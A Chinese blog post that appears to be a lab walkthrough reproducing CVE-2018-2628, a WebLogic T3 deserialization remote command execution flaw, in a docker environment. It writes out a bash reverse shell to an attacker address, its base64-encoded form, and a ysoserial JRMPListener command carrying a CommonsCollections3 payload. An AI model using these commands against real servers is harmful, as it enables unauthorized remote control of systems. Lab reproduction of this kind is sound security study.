CVE-2018-2628

Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628）

Oracle 2018年4月补丁中，修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞（CVE-2018-2628），该漏洞通过t3协议触发，可导致未授权的用户在远程服务器执行任意命令。

漏洞环境

cd weblogic/CVE-2018-2628
docker-compose up -d
docker-compose config

等待环境启动，访问http://10.10.10.8:7001/console

漏洞复现

下载ysoserial

weblogictool工具

base64译反弹shell命令，编译网站

bash -i >& /dev/tcp/10.10.10.128/4444 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}

本地使用yso启动jrmp，工具中填入本地的jrmp地址

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"

nc监听反弹的shell

连接成功！！！

posted @ 2024-05-17 11:21 kalixcn 阅读(35) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· CVE-2018-2628

· CVE-2018-2894

· Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628）

· Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628

· 服务器容器漏洞-Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628）

阅读排行：
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布：重大改进与新特性概览！
· AI与.NET技术实操系列（二）：开始使用ML.NET
· 单线程的Redis速度为什么快？

公告

昵称： kalixcn
园龄： 1年10个月
粉丝： 1
关注： 6

+加关注

2025年3月

日

一

二

三

四

五

六

随笔分类

随笔档案

阅读排行榜

评论排行榜

1. Hadoop YARN ResourceManager 未授权访问(1)

kalixcn